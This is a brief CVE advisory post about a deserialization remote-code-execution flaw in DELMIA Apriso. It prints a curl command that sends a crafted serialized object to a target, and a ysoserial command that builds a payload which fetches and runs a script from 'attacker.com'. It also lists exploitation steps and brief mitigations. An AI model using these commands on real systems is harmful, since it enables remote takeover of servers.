DELMIA Apriso, Deserialization of Untrusted Data, CVE-2024-37165 (Critical)

Listen to this Post

The vulnerability in DELMIA Apriso stems from its improper handling of user-supplied data during deserialization. A remote, unauthenticated attacker can exploit this by sending a specially crafted serialized object to a vulnerable endpoint. The application, lacking proper validation, deserializes this malicious payload. This process inadvertently executes the attacker’s embedded code within the context of the application server. The flaw allows for the bypass of standard security restrictions, granting the attacker the ability to perform arbitrary system commands, access and modify sensitive data, and achieve full control over the affected system, leading to a complete compromise.
Platform: DELMIA Apriso
Version: 2020-2025
Vulnerability: Deserialization RCE
Severity: Critical

date: 2024-06-13

Prediction: 2024-08-15

What Undercode Say:

`curl -s “http://target/endpoint” -H “Content-Type: application/x-java-serialized-object” –data-binary @malicious.ser`
`java -ysoserial.jar CommonsCollections5 ‘curl http://attacker.com/script.sh | sh’ > malicious.ser`

How Exploit:

Craft malicious serialized object with ysoserial. Send payload to vulnerable HTTP endpoint. Gain remote code execution.

Protection from this CVE:

Apply vendor patch. Restrict network access. Validate serialized data.

Impact:

Remote Code Execution. Full System Compromise. Data Breach.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top